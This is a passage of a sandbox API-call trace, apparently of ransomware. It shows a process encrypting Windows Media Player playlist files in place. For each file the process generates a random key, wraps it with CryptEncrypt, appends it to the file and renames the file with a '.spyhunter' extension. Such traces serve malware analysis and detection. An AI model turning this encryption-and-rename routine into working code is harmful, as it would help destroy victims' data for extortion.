Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl") returned 129 [0138.493] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".txt") returned 0x0 [0138.493] GetProcessHeap () returned 0x2c0000 [0138.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0138.494] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f4bc*=0x401, lpOverlapped=0x0) returned 1 [0138.495] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffbff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.495] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x401, lpNumberOfBytesWritten=0x248f4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f4bc*=0x401, lpOverlapped=0x0) returned 1 [0138.495] GetProcessHeap () returned 0x2c0000 [0138.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0138.496] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.496] WriteFile (in: hFile=0x16c, lpBuffer=0x248f4fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f4bc, lpOverlapped=0x0 | out: lpBuffer=0x248f4fc*, lpNumberOfBytesWritten=0x248f4bc*=0x4, lpOverlapped=0x0) returned 1 [0138.496] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f4bc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f4bc*=0x30, lpOverlapped=0x0) returned 1 [0138.496] CloseHandle (hObject=0x16c) returned 1 [0138.496] GetProcessHeap () returned 0x2c0000 [0138.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.496] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.spyhunter") returned 139 [0138.496] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl.spyhunter")) returned 1 [0138.497] GetProcessHeap () returned 0x2c0000 [0138.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.497] GetProcessHeap () returned 0x2c0000 [0138.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0138.497] GetProcessHeap () returned 0x2c0000 [0138.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4aa0 | out: hHeap=0x2c0000) returned 1 [0138.497] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f4f8 | out: pbBuffer=0x248f4f8) returned 1 [0138.497] GetProcessHeap () returned 0x2c0000 [0138.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0138.497] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f4f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f4f0*=0x30) returned 1 [0138.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0138.498] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl") returned 135 [0138.498] StrStrW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0138.498] GetProcessHeap () returned 0x2c0000 [0138.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0138.499] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f4b4*=0x3fc, lpOverlapped=0x0) returned 1 [0138.500] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffc04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.500] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x3fc, lpNumberOfBytesWritten=0x248f4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f4b4*=0x3fc, lpOverlapped=0x0) returned 1 [0138.500] GetProcessHeap () returned 0x2c0000 [0138.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0138.500] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.500] WriteFile (in: hFile=0x16c, lpBuffer=0x248f4f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f4b4, lpOverlapped=0x0 | out: lpBuffer=0x248f4f4*, lpNumberOfBytesWritten=0x248f4b4*=0x4, lpOverlapped=0x0) returned 1 [0138.500] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f4b4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f4b4*=0x30, lpOverlapped=0x0) returned 1 [0138.500] CloseHandle (hObject=0x16c) returned 1 [0138.500] GetProcessHeap () returned 0x2c0000 [0138.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.501] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.spyhunter") returned 145 [0138.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl.spyhunter")) returned 1 [0138.501] GetProcessHeap () returned 0x2c0000 [0138.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.501] GetProcessHeap () returned 0x2c0000 [0138.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0138.501] GetProcessHeap () returned 0x2c0000 [0138.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4948 | out: hHeap=0x2c0000) returned 1 [0138.501] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f4f8 | out: pbBuffer=0x248f4f8) returned 1 [0138.502] GetProcessHeap () returned 0x2c0000 [0138.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0138.502] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f4f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f4f0*=0x30) returned 1 [0138.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0138.502] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl") returned 136 [0138.503] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".txt") returned 0x0 [0138.503] GetProcessHeap () returned 0x2c0000 [0138.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0138.503] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f4b4*=0x410, lpOverlapped=0x0) returned 1 [0138.504] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffbf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.504] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x248f4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f4b4*=0x410, lpOverlapped=0x0) returned 1 [0138.504] GetProcessHeap () returned 0x2c0000 [0138.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0138.504] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.504] WriteFile (in: hFile=0x16c, lpBuffer=0x248f4f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f4b4, lpOverlapped=0x0 | out: lpBuffer=0x248f4f4*, lpNumberOfBytesWritten=0x248f4b4*=0x4, lpOverlapped=0x0) returned 1 [0138.504] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f4b4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f4b4*=0x30, lpOverlapped=0x0) returned 1 [0138.504] CloseHandle (hObject=0x16c) returned 1 [0138.504] GetProcessHeap () returned 0x2c0000 [0138.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.505] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.spyhunter") returned 146 [0138.505] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl.spyhunter")) returned 1 [0138.505] GetProcessHeap () returned 0x2c0000 [0138.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.505] GetProcessHeap () returned 0x2c0000 [0138.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0138.505] GetProcessHeap () returned 0x2c0000 [0138.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc9cf8 | out: hHeap=0x2c0000) returned 1 [0138.505] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f4f0 | out: pbBuffer=0x248f4f0) returned 1 [0138.506] GetProcessHeap () returned 0x2c0000 [0138.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0138.506] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f4e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f4e8*=0x30) returned 1 [0138.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0138.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl") returned 135 [0138.506] StrStrW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0138.506] GetProcessHeap () returned 0x2c0000 [0138.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0138.506] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f4ac*=0x311, lpOverlapped=0x0) returned 1 [0138.507] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffcef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.507] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x311, lpNumberOfBytesWritten=0x248f4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f4ac*=0x311, lpOverlapped=0x0) returned 1 [0138.507] GetProcessHeap () returned 0x2c0000 [0138.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0138.508] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.508] WriteFile (in: hFile=0x16c, lpBuffer=0x248f4ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f4ac, lpOverlapped=0x0 | out: lpBuffer=0x248f4ec*, lpNumberOfBytesWritten=0x248f4ac*=0x4, lpOverlapped=0x0) returned 1 [0138.508] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f4ac, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f4ac*=0x30, lpOverlapped=0x0) returned 1 [0138.508] CloseHandle (hObject=0x16c) returned 1 [0138.508] GetProcessHeap () returned 0x2c0000 [0138.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.508] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.spyhunter") returned 145 [0138.508] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl.spyhunter")) returned 1 [0138.509] GetProcessHeap () returned 0x2c0000 [0138.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.509] GetProcessHeap () returned 0x2c0000 [0138.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0138.509] GetProcessHeap () returned 0x2c0000 [0138.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc47f0 | out: hHeap=0x2c0000) returned 1 [0138.509] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f4f0 | out: pbBuffer=0x248f4f0) returned 1 [0138.509] GetProcessHeap () returned 0x2c0000 [0138.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0138.509] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f4e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f4e8*=0x30) returned 1 [0138.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0138.510] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl") returned 140 [0138.510] StrStrW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0138.510] GetProcessHeap () returned 0x2c0000 [0138.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0138.510] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f4ac*=0x31d, lpOverlapped=0x0) returned 1 [0138.565] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffce3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.566] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x31d, lpNumberOfBytesWritten=0x248f4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f4ac*=0x31d, lpOverlapped=0x0) returned 1 [0138.566] GetProcessHeap () returned 0x2c0000 [0138.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0138.566] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.566] WriteFile (in: hFile=0x16c, lpBuffer=0x248f4ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f4ac, lpOverlapped=0x0 | out: lpBuffer=0x248f4ec*, lpNumberOfBytesWritten=0x248f4ac*=0x4, lpOverlapped=0x0) returned 1 [0138.566] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f4ac, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f4ac*=0x30, lpOverlapped=0x0) returned 1 [0138.566] CloseHandle (hObject=0x16c) returned 1 [0138.566] GetProcessHeap () returned 0x2c0000 [0138.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.566] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.spyhunter") returned 150 [0138.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl.spyhunter")) returned 1 [0138.567] GetProcessHeap () returned 0x2c0000 [0138.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.567] GetProcessHeap () returned 0x2c0000 [0138.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0138.567] GetProcessHeap () returned 0x2c0000 [0138.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff4880 | out: hHeap=0x2c0000) returned 1 [0138.567] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f4e8 | out: pbBuffer=0x248f4e8) returned 1 [0138.568] GetProcessHeap () returned 0x2c0000 [0138.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0138.568] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f4e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f4e0*=0x30) returned 1 [0138.568] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0138.572] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl") returned 136 [0138.572] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".txt") returned 0x0 [0138.572] GetProcessHeap () returned 0x2c0000 [0138.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0138.572] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f4a4*=0x410, lpOverlapped=0x0) returned 1 [0138.627] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffbf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.627] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x248f4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f4a4*=0x410, lpOverlapped=0x0) returned 1 [0138.654] GetProcessHeap () returned 0x2c0000 [0138.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0138.654] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.654] WriteFile (in: hFile=0xec, lpBuffer=0x248f4e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f4a4, lpOverlapped=0x0 | out: lpBuffer=0x248f4e4*, lpNumberOfBytesWritten=0x248f4a4*=0x4, lpOverlapped=0x0) returned 1 [0138.654] WriteFile (in: hFile=0xec, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f4a4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f4a4*=0x30, lpOverlapped=0x0) returned 1 [0138.654] CloseHandle (hObject=0xec) returned 1 [0138.654] GetProcessHeap () returned 0x2c0000 [0138.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.654] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\07_TV_recorded_in_the_last_week.wpl.spyhunter") returned 146 [0138.654] MoveFileW 